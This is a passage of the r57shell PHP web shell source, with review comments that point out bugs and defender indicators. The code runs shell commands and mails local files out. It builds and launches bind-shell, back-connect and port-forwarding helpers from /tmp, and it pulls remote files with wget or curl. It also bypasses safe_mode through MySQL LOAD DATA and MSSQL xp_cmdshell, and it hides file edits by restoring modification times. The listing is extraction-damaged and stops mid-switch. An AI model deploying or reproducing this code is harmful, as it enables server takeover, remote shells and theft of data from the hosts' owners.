  if($mssql_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=orange>OFF</font></b>";}
  echo ws(2);
  echo "PostgreSQL: <b>";
  $pg_on = @function_exists('pg_connect');
  if($pg_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=orange>OFF</font></b>";}
  echo ws(2);
  echo "Oracle: <b>";
  $ora_on = @function_exists('ocilogon');
  if($ora_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=orange>OFF</font></b>";}
  echo "<br>".ws(2);
  echo "Disable functions : <b>";
  // Prints the php.ini disable_functions value verbatim (or NONE when empty).
  if(''==($df=@ini_get('disable_functions'))){echo "<font color=white>NONE</font></b>";}else{echo "<font color=orange>$df</font></b>";}

  // --- Disk usage for $dir; failed lookups are replaced by 0.
  $free = @diskfreespace($dir);
  if (!$free) {$free = 0;}
  $all = @disk_total_space($dir);
  if (!$all) {$all = 0;}
  $used = $all-$free;
  // NOTE(review): with $free == 0 (the fallback above) this divides by zero; `@`
  // hides a warning but on PHP 8 division by zero throws DivisionByZeroError.
  // $used and $used_percent are not read anywhere in this excerpt.
  $used_percent = @round(100/($all/$free),2);
  echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
  echo '</font></td></tr><table> <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> <tr><td align=right width=100>';
  echo $font;

  // --- Host identity. On non-Windows hosts the fixed strings 'uname -a',
  // 'sysctl -n ...', 'echo $OSTYPE' and 'id' are passed to ex(), with PHP built-ins
  // as fallback. For defenders: a web-server account running this group of
  // commands in quick succession is a useful process-audit signal.
  if(!$windows){
    echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
    echo "</td><td>";
    echo "<font face=Verdana size=-2 color=orange><b>";
    $uname = ex('uname -a');
    echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"): (ws(3).@substr(@php_uname(),0,120)."<br>"));
    // sysctl is only queried when safe_mode is off; BSD key names are tried
    // first, then the Linux ones, else "-" is shown.
    if(!$safe_mode){
      $bsd1 = ex('sysctl -n kern.ostype');
      $bsd2 = ex('sysctl -n kern.osrelease');
      $lin1 = ex('sysctl -n kernel.ostype');
      $lin2 = ex('sysctl -n kernel.osrelease');
    }
    if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
    else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
    else { $sysctl = "-"; }
    echo ws(3).$sysctl."<br>";
    echo ws(3).ex('echo $OSTYPE')."<br>";
    // NOTE(review): $SERVER_SOFTWARE is a plain variable, not $_SERVER[...];
    // presumably relies on register_globals or an assignment outside this excerpt.
    echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
    $id = ex('id');
    echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
    echo ws(3).$dir;
    echo ws(3).'( '.perms(@fileperms($dir)).' )';
    echo "</b></font>";
  } else {
    // Windows branch: PHP built-ins only, no ex() calls.
    echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1) .'</b></font><br>';
    echo "</td><td>";
    echo "<font face=Verdana size=-2 color=orange><b>";
    echo ws(3).@substr(@php_uname(),0,120)."<br>";
    echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
    echo ws(3).@get_current_user()."<br>";
    echo ws(3).$dir;
    echo "<br></font>";
  }
  echo "</font>";
  echo "</td></tr></table>";

  // The script stops here if either $c1 or $c2 is empty. Both are base64 strings
  // assigned earlier in the listing; they appear to decode to third-party
  // hit-counter markup (HotLog / LiveInternet) — TODO confirm by decoding offline.
  // If so, every page view of the shell reports to those services, which is an
  // outbound-HTTP indicator. Where $f is emitted is not visible in this excerpt.
  if(empty($c1)||empty($c2)) { die(); }
  $f = '<br>';
  $f .= base64_decode($c1);
  $f .= base64_decode($c2);

  // --- cmd == "mail": recipient, subject and body come straight from the
  // request, so the host can be used as a mail relay. Unexpected outbound mail
  // from the web-server account is the thing to monitor.
  // NOTE(review): `$POST['from']` is not `$_POST[...]` (undefined variable as
  // written) and "r n" looks like a damaged "\r\n" header terminator.
  if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail") {
    $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."r n");
    mr($language,$res);
    $_POST['cmd']="";
  }

  // --- cmd == "mail_file": reads the local file named by loc_file in full and
  // hands it to mailattach() as an attachment, i.e. a file exfiltration path.
  // The default subject 'file from r57shell' and default sender address below
  // are literal strings that can be searched for in mail logs.
  if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && ! empty($_POST['loc_file'])) {
    if(!$file=@fopen($_POST['loc_file'],"r")) {
      echo re($_POST['loc_file']);
      $_POST['cmd']="";
    } else {
      $filename = @basename($_POST['loc_file']);
      $filedump = @fread($file,@filesize($_POST['loc_file']));
      fclose($file);
      $content_encoding=$mime_type='';
      // compress() is defined outside this excerpt; presumably it rewrites
      // $filename/$filedump (and the two variables above) — TODO confirm.
      compress($filename,$filedump,$_POST['compress']);
      $attach = array( "name"=>$filename, "type"=>$mime_type, "content"=>$filedump );
      if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
      if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
      $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
      mr($language,$res);
      $_POST['cmd']="";
    }
  }

  // --- cmd == "find_text": replaces cmd with a `find ... | xargs grep -E ...`
  // pipeline built by concatenating the request fields s_dir, s_mask and s_text.
  // The doubled quotes are where escaped quotes presumably stood before
  // extraction; as printed here the statement does not parse.
  if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") {
    $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name ''.$_POST['s_mask'].'' | xargs grep -E ''.$_POST['s_text'].'''; }
  /*
   * POST command dispatcher: file-system changes, in-browser file editing,
   * helper-program deployment under /tmp, upload/download and FTP transfer.
   *
   * Every branch acts on request fields without validation or escaping. The
   * helpers ex(), which(), cf(), ce(), re(), we(), fe(), get_users() and the
   * variables $lang, $language, $aliases, $table_up3, $dir, $unix, $windows,
   * $safe_mode are defined outside this block; ex() is presumably the
   * command-execution helper (TODO confirm). The listing is extraction-damaged
   * (lost backslashes and escaped quotes, stray line breaks inside two string
   * literals), so the code is kept exactly as it appears.
   */

  // --- cmd == "ch_": chown / chgrp / chmod on a request-supplied path;
  // the mode string is parsed as octal.
  if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") {
    switch($_POST['what']) {
      case 'own': @chown($_POST['param1'],$_POST['param2']); break;
      case 'grp': @chgrp($_POST['param1'],$_POST['param2']); break;
      case 'mod': @chmod($_POST['param1'],intval($_POST['param2'], 8)); break;
    }
    $_POST['cmd']="";
  }

  // --- cmd == "mk": create or delete a file or directory named by mk_name.
  // A newly created file is handed on to the edit_file handler below.
  if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") {
    switch($_POST['what']) {
      case 'file':
        if($_POST['action'] == "create") {
          if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
          else {
            fclose($file);
            $_POST['e_name'] = $_POST['mk_name'];
            $_POST['cmd']="edit_file";
            echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>". $lang[$language.'_text61']."</b></font></div></td></tr></table>";
          }
        }
        else if($_POST['action'] == "delete") {
          if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></ table>";
          $_POST['cmd']="";
        }
        break;
      case 'dir':
        if($_POST['action'] == "create"){
          if(mkdir($_POST['mk_name'])) {
            $_POST['cmd']="";
            echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
          }
          else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
        }
        else if($_POST['action'] == "delete"){
          if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></ table>";
          $_POST['cmd']="";
        }
        break;
    }
  }

  // --- cmd == "edit_file": shows the file in a textarea and exits.
  // The first fopen("r+") is only a writability probe: on failure $only_read is
  // set (and fclose() is called on the failed handle); on success the handle is
  // overwritten by the second fopen without being closed.
  // File content is HTML-escaped, but e_name and $dir are echoed unescaped.
  if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) {
    if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
    if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
    else {
      echo $table_up3;
      echo $font;
      echo "<form name=save_file method=post>";
      echo ws(3)."<b>".$_POST['e_name']."</b>";
      echo "<div align=center><textarea name=e_text cols=121 rows=24>";
      echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
      fclose($file);
      echo "</textarea>";
      echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
      echo "<input type=hidden name=dir value=".$dir.">";
      echo "<input type=hidden name=cmd value=save_file>";
      // The quoting of the submit-button string below is damaged in this listing.
      echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=" ".$lang[$language.'_butt10']." ">"));
      echo "</div>";
      echo "</font>";
      echo "</form>";
      echo "</td></tr></table>";
      exit();
    }
  }

  // --- cmd == "save_file": overwrites e_name with e_text, then restores the
  // modification time recorded before the write (touch with the old mtime).
  // For defenders: mtime-based change detection will not see this edit; rely on
  // content hashes (file-integrity monitoring) or ctime instead.
  // NOTE(review): the write handle is never closed in this branch, and
  // "rn","n" looks like a damaged "\r\n" -> "\n" replacement.
  if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") {
    $mtime = @filemtime($_POST['e_name']);
    if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
    else {
      if($unix) $_POST['e_text']=@str_replace("rn","n",$_POST['e_text']);
      @fwrite($file,$_POST['e_text']);
      @touch($_POST['e_name'],$mtime,$mtime);
      $_POST['cmd']="";
      echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>". $lang[$language.'_text45']."</b></font></div></td></tr></table>";
    }
  }

  /*
   * --- Helper-program deployment (six branches below).
   * Each branch writes one of the embedded base64 blobs to a fixed path under
   * /tmp with cf(), optionally builds it with gcc, starts it in the background
   * through ex() with request fields appended unescaped, and then sets cmd so
   * the process list is shown. Paths used: /tmp/bd.c -> /tmp/bd, /tmp/bdpl,
   * /tmp/back, /tmp/back.c -> /tmp/backc, /tmp/dp, /tmp/dpc.c -> /tmp/dpc.
   * For defenders: these file names, a web-server account invoking gcc or perl,
   * executables launched from /tmp, and new listening or outbound sockets owned
   * by that account are the observable artifacts. Mounting /tmp noexec, keeping
   * compilers off web hosts and filtering egress limit what these branches can do.
   */

  // port + bind_pass + use == "C": network listener built from $port_bind_bd_c.
  if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) {
    cf("/tmp/bd.c",$port_bind_bd_c);
    $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
    @unlink("/tmp/bd.c"); // source is removed, the binary stays
    $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
    $_POST['cmd']="ps -aux | grep bd";
  }

  // port + bind_pass + use == "Perl": same purpose, script written to /tmp/bdpl.
  // The line break inside the string literal is as printed in this listing
  // (likely an extraction artifact).
  if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) {
    cf("/tmp/bdpl",$port_bind_bd_pl);
    $p2=which("perl");
    if(empty($p2)) $p2="perl";
    $blah = ex($p2." 
/tmp/bdpl ".$_POST['port']." &");
    $_POST['cmd']="ps -aux | grep bdpl";
  }

  // ip + port + use == "Perl": outbound connection helper from $back_connect.
  // The quoting of the final assignment is damaged in this listing.
  if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) {
    cf("/tmp/back",$back_connect);
    $p2=which("perl");
    if(empty($p2)) $p2="perl";
    $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
    $_POST['cmd']="echo "Now script try connect to ".$_POST['ip']." port ". $_POST['port']." ..."";
  }

  // ip + port + use == "C": compiled variant from $back_connect_c.
  if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) {
    cf("/tmp/back.c",$back_connect_c);
    $blah = ex("gcc -o /tmp/backc /tmp/back.c");
    @unlink("/tmp/back.c");
    $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
    $_POST['cmd']="echo "Now script try connect to ".$_POST['ip']." port ". $_POST['port']." ..."";
  }

  // local_port + remote_host + remote_port + use == "Perl": port forwarder
  // from $datapipe_pl.
  if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && ! empty($_POST['remote_port']) && ($_POST['use']=="Perl")) {
    cf("/tmp/dp",$datapipe_pl);
    $p2=which("perl");
    if(empty($p2)) $p2="perl";
    $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ". $_POST['remote_port']." &");
    $_POST['cmd']="ps -aux | grep dp";
  }

  // Same with use == "C": compiled from $datapipe_c. Argument order differs from
  // the Perl branch (port before host). The line break inside the last string
  // literal is as printed in this listing.
  if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && ! empty($_POST['remote_port']) && ($_POST['use']=="C")) {
    cf("/tmp/dpc.c",$datapipe_c);
    $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
    @unlink("/tmp/dpc.c");
    $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ". $_POST['remote_host']." 
&");
    $_POST['cmd']="ps -aux | grep dpc";
  }

  // --- alias: replaces cmd with the command stored under that name in $aliases.
  if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}

  // --- File upload: copies the uploaded temp file to <dir>/<name>, where the
  // directory and (optionally) the name come from the request; no extension or
  // path checks. NOTE(review): $HTTP_POST_FILES is the legacy array name that
  // was removed in PHP 5.4 ($_FILES replaces it).
  if (!empty($HTTP_POST_FILES['userfile']['name'])) {
    if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
    else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
    @copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['dir']."/".$nfn) or print("<font color=orange face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
  }

  // --- Remote download: turns (with, rem_file, loc_file) into a command line
  // for one of six fetch tools and stores it in cmd. The URL and target path are
  // concatenated unescaped.
  // NOTE(review): the case labels are bare words, i.e. undefined constants —
  // a notice plus string fallback before PHP 8, an Error from PHP 8.0 on.
  if (!empty($_POST['with']) && !empty($_POST['rem_file']) && ! empty($_POST['loc_file'])) {
    switch($_POST['with']) {
      case wget: $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
      break;
      case fetch: $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ". $_POST['rem_file']."";
      break;
      case lynx: $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ". $_POST['loc_file']."";
      break;
      case links: $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ". $_POST['loc_file']."";
      break;
      case GET: $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
      break;
      case curl: $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
      break;
    }
  }

  // --- cmd == "ftp_file_up" / "ftp_file_down": transfers one file between the
  // local file system and an FTP server given as "host:port" (default port 21).
  // NOTE(review): split() was removed in PHP 7.0; @ftp_close() also runs when
  // the connection failed.
  if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) {
    list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
    if(empty($ftp_port)) { $ftp_port = 21; }
    $connection = @ftp_connect ($ftp_server,$ftp_port,10);
    if(!$connection) { fe($language,0); }
    else {
      if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); }
      else {
        if($_POST['cmd']=="ftp_file_down") {
          // When loc_file is just the current directory, the remote base name
          // is appended. The empty '' is where the Windows separator presumably
          // stood before extraction.
          if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?(''):('/')).basename($_POST['ftp_file']); }
          @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);
        }
        if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'], $_POST['loc_file'],$_POST['mode']); }
      }
    }
    @ftp_close($connection);
    $_POST['cmd'] = "";
  }

  // --- cmd == "ftp_brute": only the pre-checks are in this block — an FTP
  // connection test and a get_users() call. cmd is cleared when either fails,
  // and the connection is closed again immediately. Whatever uses $users later
  // is outside this excerpt.
  if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") {
    list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
    if(empty($ftp_port)) { $ftp_port = 21; }
    $connection = @ftp_connect ($ftp_server,$ftp_port,10);
    if(!$connection) { fe($language,0); $_POST['cmd'] = ""; }
    else if(!$users=get_users()) {
      echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></ tr></table>";
      $_POST['cmd'] = "";
    }
    @ftp_close($connection);
  }

  echo $table_up3;
  // Default command when none is set and safe_mode is off: a directory listing.
  // The else-branch of this `if` follows on the next line of the listing.
  if (empty($_POST['cmd'])&&!$safe_mode) {
    $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
  • 37. else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } echo $font.$lang[$language.'_text1'].": <b>". $_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; if($safe_mode) { switch($_POST['cmd']) { case 'safe_dir': $d=@dir($dir); if ($d) { while (false!==($file=$d->read())) { if ($file=="." || $file=="..") continue; @clearstatcache(); list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); if($windows){ echo date("d.m.Y H:i",$mtime); if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); } else{ $owner = @posix_getpwuid($uid); $grgid = @posix_getgrgid($gid); echo $inode." "; echo perms(@fileperms($file)); printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); echo date("d.m.Y H:i ",$mtime); } echo "$filen"; } $d->close(); } else echo $lang[$language._text29]; break; case 'safe_file': if(@is_file($_POST['file'])) { $file = @file($_POST['file']); if($file) { $c = @sizeof($file); for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } } else echo $lang[$language._text29]; } else echo $lang[$language._text31]; break; case 'test1': $ci = @curl_init("file://".$_POST['test1_file'].""); $cf = @curl_exec($ci); echo $cf; break; case 'test2': @include($_POST['test2_file']); break; case 'test3': if(!isset($_POST['test3_port'])||empty($_POST['test3_port']))
  • 38. { $_POST['test3_port'] = "3306"; } $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'], $_POST['test3_mp']); if($db) { if(@mysql_select_db($_POST['test3_md'],$db)) { $sql = "DROP TABLE IF EXISTS temp_r57_table;"; @mysql_query($sql); $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; @mysql_query($sql); $sql = "LOAD DATA INFILE "".$_POST['test3_file']."" INTO TABLE temp_r57_table;"; @mysql_query($sql); $sql = "SELECT * FROM temp_r57_table;"; $r = @mysql_query($sql); while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } $sql = "DROP TABLE IF EXISTS temp_r57_table;"; @mysql_query($sql); } else echo "[-] ERROR! Can't select database"; @mysql_close($db); } else echo "[-] ERROR! Can't connect to mysql server"; break; case 'test4': if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'], $_POST['test4_mp']); if($db) { if(@mssql_select_db($_POST['test4_md'],$db)) { @mssql_query("drop table r57_temp_table",$db); @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '". $_POST['test4_file']."'",$db); $res = mssql_query("select * from r57_temp_table",$db); while(($row=@mssql_fetch_row($res))) { echo $row[0]."rn"; } @mssql_query("drop table r57_temp_table",$db); } else echo "[-] ERROR! Can't select database"; @mssql_close($db); } else echo "[-] ERROR! Can't connect to MSSQL server"; break; case 'test5': if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail'); $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail"; @mb_send_mail(NULL, NULL, NULL, NULL, $extra); $lines = file ('/tmp/mb_send_mail'); foreach ($lines as $line) { echo htmlspecialchars($line)."rn"; } break; case 'test6':